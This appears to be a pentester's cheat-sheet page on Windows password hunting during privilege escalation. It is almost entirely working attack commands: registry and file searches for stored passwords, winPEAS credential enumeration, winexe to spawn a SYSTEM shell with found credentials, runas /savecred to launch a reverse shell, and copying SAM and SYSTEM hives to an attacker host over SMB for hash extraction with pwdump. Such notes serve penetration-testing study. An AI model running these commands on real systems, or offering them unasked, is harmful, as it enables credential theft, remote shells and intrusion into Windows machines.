Password Hunting

  • Many of these will be automatically found by winpeas

  • This is one of the LAST things I look for because if it wasn't found by winpeas, it's probably tedious af so I don't go for it till the end

Registry

reg query HKLM /f password /t REG_SZ /s reg query HKCM /f password /t REG_SZ /s

  • TONS of results

.\winPEASany.exe quiet filesinfo userinfo

  • Spawn a shell

winexe -U 'admin%password123' //192.168.X.X cmd.exe

  • Or a system shell

winexe -U 'admin%password123' --system //192.168.X.X cmd.exe

Saved Creds

.\winPEASany.exe quiet cmd windowscreds
cmdkey /list

  • Start listener

runas /savecred /user:admin C:\path\to\reverseshell.exe

Config Files

  • Search current directory

dir /s *pass* == *.config findstr /si password *.xml *.ini *.txt

  • A lot of this kind of searching will be intuitive based off of certain things noticed while enumerating

SAM

  • With SAM and SYSTEM files the hashes can be extracted

C:\Windows\System32\config

  • Cannot get these with system running, but maybe the backups

C:\Windows\System32\config\RegBack
C:\Windows\Repair

  • Copy to kali and crack

copy C:\Windows\Repair\SAM \\192.168.X.X\files copy C:\Windows\Repair\SYSTEM \\192.168.X.X\files
pwdump.py SYSTEM SAM
PreviousService ExploitsNextScheduled Tasks

Last updated